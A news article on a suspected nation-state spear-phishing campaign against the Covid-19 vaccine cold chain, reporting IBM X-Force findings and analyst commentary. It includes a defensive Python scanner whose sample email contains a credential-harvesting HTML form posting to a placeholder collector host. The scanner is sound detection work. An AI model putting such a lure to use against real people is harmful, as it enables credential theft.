Elements of the international vaccine supply chain are being targeted by a global phishing campaign that is likely the work of a national state-backed cyber attacker, according to IBM Security’s X-Force unit.
This development comes on the heels of a global alert issued by Interpol to its 194 member states, warning that malicious actors were targeting organizations associated with Covid-19 vaccines.
The ongoing campaign is aimed at organizations closely associated with the cold chain, part of the vaccine supply chain that ensures the safe storage of vaccines in temperature-controlled environments during transit.
The cold chain will be critical to the deployment of two of the most promising Covid-19 vaccines: the one developed by Pfizer / BioNTech, which must be kept at -70°C, and the one developed by Moderna, which must be kept at -20°C.
The X-Force team said their analysis pointed to a “calculated operation” starting in September, covering six countries and targeting organizations associated with the international vaccine alliance Gavi’s Cold Chain Equipment Optimization Platform (CCEOP).
The team was unable to attribute the campaign, but said that the precise targeting of key executives in relevant organizations carried the “potential hallmarks of nation-state tradecraft.”
IBM Strategic Cyber Threat Senior Analyst Claire Zaboeva wrote: “While attribution is currently unknown, the precise targeting and nature of the specific organizations targeted potentially point to nation-state activity.
“Without a clear path to cash out, cybercriminals are unlikely to dedicate the time and resources required to execute such a calculated operation with so many interconnected and globally distributed targets. Similarly, understanding the transportation of a vaccine can represent a hot commodity on the black market. However, advanced information on the purchase and movement of a vaccine that can affect life and the world economy is likely to be a high-value, high-priority target for nation states.”
According to IBM X-Force, the attacker has been posing as an executive from Haier Biomedical, a cold chain specialist, to target organizations such as the European Commission’s Directorate-General for Taxation and Customs Union, as well as companies in the energy, manufacturing, website creation, and software and internet security sectors.
The spear-phishing emails were primarily directed at executives in the sales, procurement, IT, and finance departments, but in some cases also at people from other parts of the organization.
The subject lines are appointment requests related to the CCEOP program, but the emails carry malicious HTML attachments that, when opened locally, prompt the victim to enter their credentials in order to view the file.
Their goal is almost certainly to collect credentials and thus gain future access to corporate networks and data on vaccine distribution processes, methods, and plans, such as information on how governments will put the Covid-19 vaccine in the hands of national health services.
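Because the credential prompt is rendered from an attachment opened on disk rather than from a link, URL-reputation filters never see it; the attachment body itself has to be inspected. As an added, defender-side example (not code from the IBM report), this Python scanner flags HTML attachments that contain a password field or a form posting to an external host. The sample message, hostnames and filename are constructed placeholders.

```python
import email
import re
from email import policy

# Constructed sample (not a real campaign message): an "appointment request" whose attached HTML file renders a credential form when opened locally.
SAMPLE_EML = """From: "Executive" <sender@example.invalid>
To: procurement@example.invalid
Subject: CCEOP appointment request
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Please see the attached request and confirm your availability.
--b1
Content-Type: text/html; charset="utf-8"
Content-Disposition: attachment; filename="appointment.html"

<html><body><form action="https://collector.example.invalid/login" method="post">
<input name="user"><input type="password" name="pass"><input type="submit">
</form></body></html>
--b1--
"""

PASSWORD_INPUT = re.compile(r'<input[^>]+type\s*=\s*["\']?password', re.I)
FORM_ACTION = re.compile(r'<form[^>]+action\s*=\s*["\']?(https?://[^"\'\s>]+)', re.I)


def html_attachments(raw_message):
    """Yield (filename, html_text) for every attached HTML file in a message."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if part.get_content_type() == "text/html" or name.lower().endswith((".html", ".htm")):
            data = part.get_content()
            if isinstance(data, bytes):  # e.g. sent as application/octet-stream
                data = data.decode("utf-8", "replace")
            yield name, data

def assess(raw_message):
    """Return [(filename, [reasons])] for HTML attachments that look like local credential prompts."""
    findings = []
    for name, html in html_attachments(raw_message):
        reasons = []
        if PASSWORD_INPUT.search(html):
            reasons.append("password input field")
        for url in FORM_ACTION.findall(html):
            reasons.append(f"form posts to external URL {url}")
        if reasons:
            findings.append((name, reasons))
    return findings
```

Messages with findings are candidates for quarantine and for a look at the attachment's form target in proxy or DNS logs.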
Max Heinemeyer, director of threat hunting at Darktrace, said attacking the vaccine supply chain is likely to be easier for perpetrators than pursuing prime targets in the healthcare sector.
“This particular effort to disrupt vaccine research and development confirms that the barrier between ‘cyber’ and ‘physical’ supply chains has almost dissolved,” he said. “Today’s attacks can start in the inbox and end up disrupting the delivery chain of a critical vaccine or service.”
“A single phishing attack is easy to carry out, but running an orchestrated spear-phishing campaign against high-profile targets like this shows a lot of sophistication. The attack appears broad and sophisticated, broader than typical cybercrime campaigns that aim for rapid monetization.”
Although the goals of the campaign are, at this stage, mere speculation, Heinemeyer suggested that information about the physical whereabouts of vaccines that must be kept extremely cold could be useful information for many nation states.
The fact that the campaign has been running for some time is also cause for concern, he added. “Organizations need to get a lot better at detecting unusual digital activity at a much earlier stage, using cutting edge defense technology, particularly artificial intelligence, across their entire digital infrastructure,” he said.
Maria Namestnikova, Head of Kaspersky’s Global Research and Analysis Team (GReAT) in Russia, said: “Threat actors continue to pivot and exploit the Covid-19 pandemic to carry out highly advanced cyber attacks with this latest attack on the Covid-19 vaccine. Recently, Kaspersky and several other cybersecurity companies have noticed a growing interest from APT threat actors in vaccine development.
“During the first six months of research on a Covid-19 vaccine, there were only messages from Western intelligence agencies about WellMess’s attacks on drug developers. Now, in recent weeks, the cybersecurity community has reported attempts to engage investigators in the US, South Korea, Canada, France, and India.
“Some of this activity is reported to have been linked to North Korean actors. Overall, we believe that APT stakeholders’ interest in vaccine development will continue to grow and that these attacks will be exploited as part of a geopolitical strategy. Thus, false flags, for example email addresses with a .ru domain, a technique already used by some threat actors, can be used to try to deflect attackers’ suspicions, leading to potential geopolitical disputes.”
IBM’s Zaboeva added: “IBM Security X-Force urges companies in the Covid-19 supply chain, from researching therapies, delivering healthcare to distributing a vaccine, to be vigilant and on high alert during this time.
“Governments have already warned that foreign entities are likely to attempt cyber espionage to steal information on vaccines. Today, in conjunction with this blog, DHS CISA is issuing an alert encouraging organizations associated with the storage and transportation of a vaccine to review this research and recommended best practices to remain vigilant.”